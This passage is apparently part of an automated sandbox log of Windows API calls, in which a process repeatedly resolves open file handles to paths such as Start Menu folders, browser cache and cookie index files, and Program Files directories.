HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 0x66 [0128.732] CloseHandle (hObject=0xa4) returned 1 [0128.732] GetFileType (hFile=0x114) returned 0x1 [0128.732] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat") returned 0x58 [0128.734] CloseHandle (hObject=0x114) returned 1 [0128.734] GetFileType (hFile=0xa4) returned 0x1 [0128.734] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu") returned 0x2f [0128.734] CloseHandle (hObject=0xa4) returned 1 [0128.734] GetFileType (hFile=0x114) returned 0x1 [0128.735] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu") returned 0x2f [0128.735] CloseHandle (hObject=0x114) returned 1 [0128.735] GetFileType (hFile=0xa4) returned 0x1 [0128.735] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned 0x4e [0128.736] CloseHandle (hObject=0xa4) returned 1 [0128.736] GetFileType (hFile=0x114) returned 0x1 [0128.736] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned 0x4e [0128.737] CloseHandle (hObject=0x114) returned 1 [0128.737] GetFileType (hFile=0xa4) returned 0x1 [0128.738] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0128.739] CloseHandle (hObject=0xa4) returned 1 [0128.739] GetFileType (hFile=0x114) returned 0x1 [0128.739] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0128.739] CloseHandle (hObject=0x114) returned 1 [0128.740] GetFileType (hFile=0xa4) returned 0x1 [0128.740] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\Public\\Desktop") returned 0x1b [0128.741] CloseHandle (hObject=0xa4) returned 1 [0128.741] GetFileType (hFile=0x114) returned 0x1 [0128.741] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\Public\\Desktop") returned 0x1b [0128.742] CloseHandle (hObject=0x114) returned 1 [0128.742] GetFileType (hFile=0xa4) returned 0x1 [0128.742] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn") returned 0x46 [0128.743] CloseHandle (hObject=0xa4) returned 1 [0128.743] GetFileType (hFile=0x114) returned 0x1 [0128.743] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn") returned 0x46 [0128.745] CloseHandle (hObject=0x114) returned 1 [0128.745] GetFileType (hFile=0xa4) returned 0x1 [0128.745] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\wdmaud.drv.mui") returned 0x2c [0128.786] CloseHandle (hObject=0xa4) returned 1 [0128.786] GetFileType (hFile=0x114) returned 0x1 [0128.786] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\MMDevAPI.dll.mui") returned 0x2e [0129.085] CloseHandle (hObject=0x114) returned 1 [0129.085] GetFileType (hFile=0xa4) returned 0x1 [0129.085] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\bthprops.cpl.mui") returned 0x2e [0129.090] CloseHandle (hObject=0xa4) returned 1 [0129.090] GetFileType (hFile=0x114) returned 0x1 [0129.090] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.091] CloseHandle (hObject=0x114) returned 1 [0129.091] GetFileType (hFile=0xa4) returned 0x1 [0129.091] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.092] CloseHandle (hObject=0xa4) returned 1 [0129.092] GetFileType (hFile=0x114) returned 0x1 [0129.092] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\msutb.dll.mui") returned 0x2b [0129.106] CloseHandle (hObject=0x114) returned 1 [0129.106] GetFileType (hFile=0xa4) returned 0x1 [0129.106] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\msctf.dll.mui") returned 0x2b [0129.107] CloseHandle (hObject=0xa4) returned 1 [0129.108] GetFileType (hFile=0x114) returned 0x1 [0129.108] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.108] CloseHandle (hObject=0x114) returned 1 [0129.108] GetFileType (hFile=0xa4) returned 0x0 [0129.109] CloseHandle (hObject=0xa4) returned 1 [0129.109] GetFileType (hFile=0x114) returned 0x1 [0129.109] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.109] CloseHandle (hObject=0x114) returned 1 [0129.110] GetFileType (hFile=0xa4) returned 0x1 [0129.110] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned 0x55 [0129.111] CloseHandle (hObject=0xa4) returned 1 [0129.111] GetFileType (hFile=0x114) returned 0x1 [0129.111] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned 0x55 [0129.112] CloseHandle (hObject=0x114) returned 1 [0129.112] GetFileType (hFile=0xa4) returned 0x1 [0129.112] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.113] CloseHandle (hObject=0xa4) returned 1 [0129.113] GetFileType (hFile=0x114) returned 0x1 [0129.113] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\netshell.dll.mui") returned 0x2e [0129.166] CloseHandle (hObject=0x114) returned 1 [0129.166] GetFileType (hFile=0xa4) returned 0x0 [0129.166] CloseHandle (hObject=0xa4) returned 1 [0129.166] GetFileType (hFile=0x114) returned 0x1 [0129.167] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\KernelBase.dll.mui") returned 0x30 [0129.168] CloseHandle (hObject=0x114) returned 1 [0129.168] GetFileType (hFile=0xa4) returned 0x1 [0129.168] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.169] CloseHandle (hObject=0xa4) returned 1 [0129.169] GetFileType (hFile=0x114) returned 0x1 [0129.169] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.170] CloseHandle (hObject=0x114) returned 1 [0129.170] GetFileType (hFile=0xa4) returned 0x1 [0129.170] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.171] CloseHandle (hObject=0xa4) returned 1 [0129.171] GetFileType (hFile=0x114) returned 0x1 [0129.171] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.172] CloseHandle (hObject=0x114) returned 1 [0129.172] GetFileType (hFile=0xa4) returned 0x1 [0129.172] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.173] CloseHandle (hObject=0xa4) returned 1 [0129.173] GetFileType (hFile=0x114) returned 0x1 [0129.173] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 0x4b [0129.175] CloseHandle (hObject=0x114) returned 1 [0129.175] GetFileType (hFile=0xa4) returned 0x1 [0129.175] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.176] CloseHandle (hObject=0xa4) returned 1 [0129.176] GetFileType (hFile=0x114) returned 0x1 [0129.176] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\ActionCenter.dll.mui") returned 0x32 [0129.180] CloseHandle (hObject=0x114) returned 1 [0129.180] GetFileType (hFile=0xa4) returned 0x1 [0129.180] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0129.181] CloseHandle (hObject=0xa4) returned 1 [0129.181] GetFileType (hFile=0x114) returned 0x0 [0129.181] CloseHandle (hObject=0x114) returned 1 [0129.181] GetFileType (hFile=0xa4) returned 0x1 [0129.181] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat") returned 0x70 [0129.183] CloseHandle (hObject=0xa4) returned 1 [0129.183] GetFileType (hFile=0x114) returned 0x1 [0129.183] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat") returned 0x55 [0129.184] CloseHandle (hObject=0x114) returned 1 [0129.184] GetFileType (hFile=0xa4) returned 0x1 [0129.184] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat") returned 0x5f [0129.186] CloseHandle (hObject=0xa4) returned 1 [0129.186] GetFileType (hFile=0x114) returned 0x1 [0129.186] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012020022120200222\\index.dat") returned 0x78 [0129.187] CloseHandle (hObject=0x114) returned 1 [0129.187] GetFileType (hFile=0xa4) returned 0x1 [0129.187] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32") returned 0x17 [0129.188] CloseHandle (hObject=0xa4) returned 1 [0129.188] GetFileType (hFile=0x114) returned 0x0 [0129.188] CloseHandle (hObject=0x114) returned 1 [0129.188] GetFileType (hFile=0xa4) returned 0x0 [0129.188] CloseHandle (hObject=0xa4) returned 1 [0129.188] GetFileType (hFile=0x114) returned 0x1 [0129.188] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\KernelBase.dll.mui") returned 0x30 [0129.189] CloseHandle (hObject=0x114) returned 1 [0129.189] GetFileType (hFile=0xa4) returned 0x1 [0129.189] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32\\en-US\\msutb.dll.mui") returned 0x2b [0129.190] CloseHandle (hObject=0xa4) returned 1 [0129.190] GetFileType (hFile=0x114) returned 0x1 [0129.190] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32") returned 0x17 [0129.191] CloseHandle (hObject=0x114) returned 1 [0129.191] GetFileType (hFile=0xa4) returned 0x0 [0129.191] CloseHandle (hObject=0xa4) returned 1 [0129.191] GetFileType (hFile=0x114) returned 0x1 [0129.191] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.191] CloseHandle (hObject=0x114) returned 1 [0129.191] GetFileType (hFile=0xa4) returned 0x1 [0129.191] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows NT") returned 0x1f [0129.192] CloseHandle (hObject=0xa4) returned 1 [0129.192] GetFileType (hFile=0x114) returned 0x1 [0129.192] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.192] CloseHandle (hObject=0x114) returned 1 [0129.192] GetFileType (hFile=0xa4) returned 0x1 [0129.193] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services") returned 0x37 [0129.193] CloseHandle (hObject=0xa4) returned 1 [0129.193] GetFileType (hFile=0x114) returned 0x1 [0129.193] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.194] CloseHandle (hObject=0x114) returned 1 [0129.194] GetFileType (hFile=0xa4) returned 0x1 [0129.194] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Defender") returned 0x25 [0129.194] CloseHandle (hObject=0xa4) returned 1 [0129.194] GetFileType (hFile=0x114) returned 0x1 [0129.194] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.195] CloseHandle (hObject=0x114) returned 1 [0129.195] GetFileType (hFile=0xa4) returned 0x1 [0129.195] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services") returned 0x36 [0129.195] CloseHandle (hObject=0xa4) returned 1 [0129.195] GetFileType (hFile=0x114) returned 0x1 [0129.195] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.196] CloseHandle (hObject=0x114) returned 1 [0129.196] GetFileType (hFile=0xa4) returned 0x1 [0129.196] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition") returned 0x39 [0129.196] CloseHandle (hObject=0xa4) returned 1 [0129.196] GetFileType (hFile=0x114) returned 0x1 [0129.196] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.197] CloseHandle (hObject=0x114) returned 1 [0129.197] GetFileType (hFile=0xa4) returned 0x1 [0129.197] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\MSBuild") returned 0x1c [0129.198] CloseHandle (hObject=0xa4) returned 1 [0129.198] GetFileType (hFile=0x114) returned 0x1 [0129.198] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.198] CloseHandle (hObject=0x114) returned 1 [0129.198] GetFileType (hFile=0xa4) returned 0x1 [0129.198] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\DVD Maker") returned 0x1e [0129.198] CloseHandle (hObject=0xa4) returned 1 [0129.199] GetFileType (hFile=0x114) returned 0x1 [0129.199] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.199] CloseHandle (hObject=0x114) returned 1 [0129.199] GetFileType (hFile=0xa4) returned 0x1 [0129.199] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows NT") returned 0x1f [0129.200] CloseHandle (hObject=0xa4) returned 1 [0129.200] GetFileType (hFile=0x114) returned 0x1 [0129.200] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.200] CloseHandle (hObject=0x114) returned 1 [0129.200] GetFileType (hFile=0xa4) returned 0x1 [0129.200] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar") returned 0x2a [0129.201] CloseHandle (hObject=0xa4) returned 1 [0129.201] GetFileType (hFile=0x114) returned 0x1 [0129.201] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.201] CloseHandle (hObject=0x114) returned 1 [0129.201] GetFileType (hFile=0xa4) returned 0x1 [0129.201] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Mail") returned 0x27 [0129.202] CloseHandle (hObject=0xa4) returned 1 [0129.202] GetFileType (hFile=0x114) returned 0x1 [0129.202] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.203] CloseHandle (hObject=0x114) returned 1 [0129.203] GetFileType (hFile=0xa4) returned 0x1 [0129.203] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Mail") returned 0x27 [0129.203] CloseHandle (hObject=0xa4) returned 1 [0129.203] GetFileType (hFile=0x114) returned 0x1 [0129.204] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.204] CloseHandle (hObject=0x114) returned 1 [0129.204] GetFileType (hFile=0xa4) returned 0x1 [0129.204] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Google") returned 0x21 [0129.205] CloseHandle (hObject=0xa4) returned 1 [0129.205] GetFileType (hFile=0x114) returned 0x1 [0129.205] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.206] CloseHandle (hObject=0x114) returned 1 [0129.206] GetFileType (hFile=0xa4) returned 0x1 [0129.206] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Microsoft Office") returned 0x2b [0129.206] CloseHandle (hObject=0xa4) returned 1 [0129.206] GetFileType (hFile=0x114) returned 0x1 [0129.206] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.207] CloseHandle (hObject=0x114) returned 1 [0129.207] GetFileType (hFile=0xa4) returned 0x1 [0129.207] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Google") returned 0x21 [0129.207] CloseHandle (hObject=0xa4) returned 1 [0129.207] GetFileType (hFile=0x114) returned 0x1 [0129.208] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.208] CloseHandle (hObject=0x114) returned 1 [0129.208] GetFileType (hFile=0xa4) returned 0x1 [0129.208] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Google") returned 0x21 [0129.209] CloseHandle (hObject=0xa4) returned 1 [0129.209] GetFileType (hFile=0x114) returned 0x1 [0129.209] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.209] CloseHandle (hObject=0x114) returned 1 [0129.210] GetFileType (hFile=0xa4) returned 0x1 [0129.210] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8") returned 0x34 [0129.212] CloseHandle (hObject=0xa4) returned 1 [0129.212] GetFileType (hFile=0x114) returned 0x1 [0129.212] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.213] CloseHandle (hObject=0x114) returned 1 [0129.213] GetFileType (hFile=0xa4) returned 0x1 [0129.213] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices") returned 0x33 [0129.213] CloseHandle (hObject=0xa4) returned 1 [0129.213] GetFileType (hFile=0x114) returned 0x1 [0129.213] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.214] CloseHandle (hObject=0x114) returned 1 [0129.214] GetFileType (hFile=0xa4) returned 0x1 [0129.214] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer") returned 0x2f [0129.214] CloseHandle (hObject=0xa4) returned 1 [0129.214] GetFileType (hFile=0x114) returned 0x1 [0129.214] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.215] CloseHandle (hObject=0x114) returned 1 [0129.215] GetFileType (hFile=0xa4) returned 0x1 [0129.215] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Java") returned 0x1f [0129.215] CloseHandle (hObject=0xa4) returned 1 [0129.215] GetFileType (hFile=0x114) returned 0x1 [0129.215] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.216] CloseHandle (hObject=0x114) returned 1 [0129.216] GetFileType (hFile=0xa4) returned 0x1 [0129.216] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Portable Devices") returned 0x2d [0129.216] CloseHandle (hObject=0xa4) returned 1 [0129.216] GetFileType (hFile=0x114) returned 0x1 [0129.216] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: 